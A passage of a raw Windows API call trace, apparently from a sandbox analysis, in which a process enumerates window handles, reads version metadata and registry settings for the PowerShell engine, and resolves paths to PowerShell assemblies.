returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x860 [0071.757] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x850 [0071.757] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x840 [0071.757] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x830 [0071.757] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x820 [0071.757] GetLastError () returned 0x0 [0071.757] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x810 [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x734 [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x124 [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x6dc [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x5bc [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x598 [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7cc [0071.758] GetLastError () returned 0x0 [0071.758] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x620 [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x138 [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7e8 [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x694 [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x704 [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x2c4 [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x201b2, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x76c [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x5ac [0071.759] GetLastError () returned 0x0 [0071.759] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x544 [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7dc [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7d0 [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7f4 [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x774 [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7bc [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x40c [0071.760] GetLastError () returned 0x0 [0071.760] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x788 [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7c0 [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7a0 [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x244 [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x1c0 [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x780 [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x57c [0071.761] GetLastError () returned 0x0 [0071.761] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x7b0 [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x290 [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x70c [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x534 [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x50c [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x514 [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4f0 [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x58c [0071.762] GetLastError () returned 0x0 [0071.762] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.763] GetLastError () returned 0x0 [0071.763] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x4f4 [0071.763] GetLastError () returned 0x0 [0071.763] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x794 [0071.763] GetLastError () returned 0x0 [0071.763] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x458 [0071.763] GetLastError () returned 0x0 [0071.763] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xae3a0 | out: lpdwProcessId=0xae3a0) returned 0x778 [0071.763] GetLastError () returned 0x0 [0071.763] GetLastError () returned 0x0 [0071.767] WerSetFlags () returned 0x0 [0071.782] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0071.784] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xae77c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xae778 | out: pulNumLanguages=0xae77c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xae778) returned 1 [0071.785] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xae77c, pwszLanguagesBuffer=0x2a63eb4, pcchLanguagesBuffer=0xae778 | out: pulNumLanguages=0xae77c, pwszLanguagesBuffer=0x2a63eb4, pcchLanguagesBuffer=0xae778) returned 1 [0071.797] GetUserDefaultLocaleName (in: lpLocaleName=0x54b630, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0071.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.823] GetLastError () returned 0xcb [0071.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.828] GetLastError () returned 0xcb [0071.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.830] GetLastError () returned 0xcb [0071.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.841] GetLastError () returned 0xcb [0071.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.841] GetLastError () returned 0xcb [0071.841] SetErrorMode (uMode=0x1) returned 0x1 [0071.841] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xae688 | out: lpFileInformation=0xae688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0071.841] GetLastError () returned 0xcb [0071.841] SetErrorMode (uMode=0x1) returned 0x1 [0071.841] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xae70c | out: lpdwHandle=0xae70c) returned 0x94c [0071.842] GetLastError () returned 0x0 [0071.842] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a663e4 | out: lpData=0x2a663e4) returned 1 [0071.843] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xae6d8, puLen=0xae6d4 | out: lplpBuffer=0xae6d8*=0x2a66480, puLen=0xae6d4) returned 1 [0071.843] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a6655c, puLen=0xae650) returned 1 [0071.843] lstrlenW (lpString="Microsoft Corporation") returned 21 [0071.843] lstrcpyW (in: lpString1=0x54b630, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0071.843] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a665b0, puLen=0xae650) returned 1 [0071.843] lstrlenW (lpString="System.Management.Automation") returned 28 [0071.843] lstrcpyW (in: lpString1=0x54b630, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0071.843] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a6660c, puLen=0xae650) returned 1 [0071.843] lstrlenW (lpString="6.1.7601.17514") returned 14 [0071.843] lstrcpyW (in: lpString1=0x54b630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0071.843] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a6664c, puLen=0xae650) returned 1 [0071.843] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0071.843] lstrcpyW (in: lpString1=0x54b630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0071.843] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a666b4, puLen=0xae650) returned 1 [0071.843] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0071.843] lstrcpyW (in: lpString1=0x54b630, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a66750, puLen=0xae650) returned 1 [0071.844] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0071.844] lstrcpyW (in: lpString1=0x54b630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a667b4, puLen=0xae650) returned 1 [0071.844] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0071.844] lstrcpyW (in: lpString1=0x54b630, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a66830, puLen=0xae650) returned 1 [0071.844] lstrlenW (lpString="6.1.7601.17514") returned 14 [0071.844] lstrcpyW (in: lpString1=0x54b630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x2a664d8, puLen=0xae650) returned 1 [0071.844] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0071.844] lstrcpyW (in: lpString1=0x54b630, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x0, puLen=0xae650) returned 0 [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x0, puLen=0xae650) returned 0 [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xae654, puLen=0xae650 | out: lplpBuffer=0xae654*=0x0, puLen=0xae650) returned 0 [0071.844] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xae648, puLen=0xae644 | out: lplpBuffer=0xae648*=0x2a66480, puLen=0xae644) returned 1 [0071.844] VerLanguageNameW (in: wLang=0x0, szLang=0x54b630, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0071.845] VerQueryValueW (in: pBlock=0x2a663e4, lpSubBlock="\\", lplpBuffer=0xae65c, puLen=0xae658 | out: lplpBuffer=0xae65c*=0x2a6640c, puLen=0xae658) returned 1 [0071.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.852] GetLastError () returned 0xcb [0071.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.861] GetLastError () returned 0xcb [0071.865] lstrlenW (lpString="䅁") returned 1 [0071.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xae620 | out: phkResult=0xae620*=0x328) returned 0x0 [0071.869] RegOpenKeyExW (in: hKey=0x328, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xae624 | out: phkResult=0xae624*=0x32c) returned 0x0 [0071.869] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xae658 | out: phkResult=0xae658*=0x330) returned 0x0 [0071.871] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae698, lpData=0x0, lpcbData=0xae694*=0x0 | out: lpType=0xae698*=0x1, lpData=0x0, lpcbData=0xae694*=0x56) returned 0x0 [0071.873] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xae698, lpData=0x54b630, lpcbData=0xae694*=0x56 | out: lpType=0xae698*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xae694*=0x56) returned 0x0 [0071.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.876] GetLastError () returned 0x0 [0071.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.878] GetLastError () returned 0x0 [0071.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0071.885] GetLastError () returned 0x0 [0071.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0071.900] GetLastError () returned 0xcb [0072.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0072.175] GetLastError () returned 0x2 [0072.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0072.175] GetLastError () returned 0x2 [0072.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.304] GetLastError () returned 0xcb [0072.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.305] GetLastError () returned 0xcb [0072.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.342] GetLastError () returned 0xcb [0072.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.343] GetLastError () returned 0xcb [0072.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.343] GetLastError () returned 0xcb [0072.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0072.546] GetLastError () returned 0x0 [0072.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0072.546] GetLastError () returned 0x0 [0072.572] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.572] GetLastError () returned 0xcb [0072.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54b630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.574] GetLastError () returned 0xcb [0072.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0072.640] GetLastError () returned 0x7e [0072.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0072.640] GetLastError () returned 0x7e [0073.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0073.587] GetLastError () returned 0x2 [0073.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0073.587] GetLastError () returned 0x2 [0073.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0073.722] GetLastError () returned 0x57 [0073.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0073.722] GetLastError () returned 0x57 [0073.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0073.875] GetLastError () returned 0x2 [0073.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xae160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0073.875] GetLastError () returned 0x2 [0074.010] GetFullPathNameW (in: 